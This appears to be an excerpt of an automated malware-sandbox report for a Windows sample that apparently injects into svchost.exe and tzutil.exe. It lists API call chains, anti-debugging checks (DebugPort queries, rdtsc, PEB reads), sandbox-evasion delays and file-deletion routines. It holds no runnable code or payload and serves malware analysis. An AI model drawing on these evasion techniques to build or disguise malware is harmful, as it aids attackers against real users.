Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007748D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_007748D7
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007F5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_007F5376

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_00793187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00793187

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	API/Special instruction interceptor: Address: 114FBF4
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_030AD1C0 rdtsc

1_2_030AD1C0

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102100

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe TID: 352	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe TID: 2492	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe TID: 2492	Thread sleep time: -74000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\tzutil.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\tzutil.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007D445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_007D445A
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DC6D1 FindFirstFileW,FindClose,	0_2_007DC6D1
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_007DC75C
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007DEF95
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007DF0F2
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007DF3F3
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007D37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007D37EF
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007D3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007D3B12
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007DBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007DBCBC

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007749A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007749A0

Source: SUMCVKBWRXks.exe, 00000005.00000002.3552832452.000000000106E000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3552198154.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2506046506.000001F960E4D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

API call chain: ExitProcess graph end node

graph_0-100676

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_030AD1C0 rdtsc

1_2_030AD1C0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_02617AA3 LdrLoadDll,

1_2_02617AA3

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007E3F09 BlockInput,

0_2_007E3F09

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_00773B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00773B3A

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007A5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_007A5A7C

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_00774B37 LoadLibraryA,GetProcAddress,

0_2_00774B37

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0114E840 mov eax, dword ptr fs:[00000030h]	0_2_0114E840
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0114FE60 mov eax, dword ptr fs:[00000030h]	0_2_0114FE60
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0114FEC0 mov eax, dword ptr fs:[00000030h]	0_2_0114FEC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B930B mov eax, dword ptr fs:[00000030h]	1_2_030B930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B930B mov eax, dword ptr fs:[00000030h]	1_2_030B930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B930B mov eax, dword ptr fs:[00000030h]	1_2_030B930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h]	1_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h]	1_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F132D mov eax, dword ptr fs:[00000030h]	1_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F132D mov eax, dword ptr fs:[00000030h]	1_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305F32A mov eax, dword ptr fs:[00000030h]	1_2_0305F32A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03027330 mov eax, dword ptr fs:[00000030h]	1_2_03027330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302D34C mov eax, dword ptr fs:[00000030h]	1_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302D34C mov eax, dword ptr fs:[00000030h]	1_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03105341 mov eax, dword ptr fs:[00000030h]	1_2_03105341
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03029353 mov eax, dword ptr fs:[00000030h]	1_2_03029353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03029353 mov eax, dword ptr fs:[00000030h]	1_2_03029353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h]	1_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EF367 mov eax, dword ptr fs:[00000030h]	1_2_030EF367
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D437C mov eax, dword ptr fs:[00000030h]	1_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03037370 mov eax, dword ptr fs:[00000030h]	1_2_03037370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03037370 mov eax, dword ptr fs:[00000030h]	1_2_03037370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03037370 mov eax, dword ptr fs:[00000030h]	1_2_03037370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]	1_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]	1_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310539D mov eax, dword ptr fs:[00000030h]	1_2_0310539D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0308739A mov eax, dword ptr fs:[00000030h]	1_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0308739A mov eax, dword ptr fs:[00000030h]	1_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030533A5 mov eax, dword ptr fs:[00000030h]	1_2_030533A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030633A0 mov eax, dword ptr fs:[00000030h]	1_2_030633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030633A0 mov eax, dword ptr fs:[00000030h]	1_2_030633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h]	1_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h]	1_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EB3D0 mov ecx, dword ptr fs:[00000030h]	1_2_030EB3D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EF3E6 mov eax, dword ptr fs:[00000030h]	1_2_030EF3E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031053FC mov eax, dword ptr fs:[00000030h]	1_2_031053FC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030663FF mov eax, dword ptr fs:[00000030h]	1_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03067208 mov eax, dword ptr fs:[00000030h]	1_2_03067208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03067208 mov eax, dword ptr fs:[00000030h]	1_2_03067208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03105227 mov eax, dword ptr fs:[00000030h]	1_2_03105227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302823B mov eax, dword ptr fs:[00000030h]	1_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03029240 mov eax, dword ptr fs:[00000030h]	1_2_03029240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03029240 mov eax, dword ptr fs:[00000030h]	1_2_03029240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h]	1_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h]	1_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306724D mov eax, dword ptr fs:[00000030h]	1_2_0306724D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h]	1_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EB256 mov eax, dword ptr fs:[00000030h]	1_2_030EB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EB256 mov eax, dword ptr fs:[00000030h]	1_2_030EB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]	1_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FD26B mov eax, dword ptr fs:[00000030h]	1_2_030FD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FD26B mov eax, dword ptr fs:[00000030h]	1_2_030FD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]	1_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03059274 mov eax, dword ptr fs:[00000030h]	1_2_03059274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03071270 mov eax, dword ptr fs:[00000030h]	1_2_03071270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03071270 mov eax, dword ptr fs:[00000030h]	1_2_03071270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]	1_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]	1_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03105283 mov eax, dword ptr fs:[00000030h]	1_2_03105283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306329E mov eax, dword ptr fs:[00000030h]	1_2_0306329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306329E mov eax, dword ptr fs:[00000030h]	1_2_0306329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]	1_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]	1_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]	1_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]	1_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]	1_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]	1_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]	1_2_030F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]	1_2_030F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]	1_2_030F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]	1_2_030F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C72A0 mov eax, dword ptr fs:[00000030h]	1_2_030C72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C72A0 mov eax, dword ptr fs:[00000030h]	1_2_030C72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B92BC mov eax, dword ptr fs:[00000030h]	1_2_030B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B92BC mov eax, dword ptr fs:[00000030h]	1_2_030B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B92BC mov ecx, dword ptr fs:[00000030h]	1_2_030B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B92BC mov ecx, dword ptr fs:[00000030h]	1_2_030B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
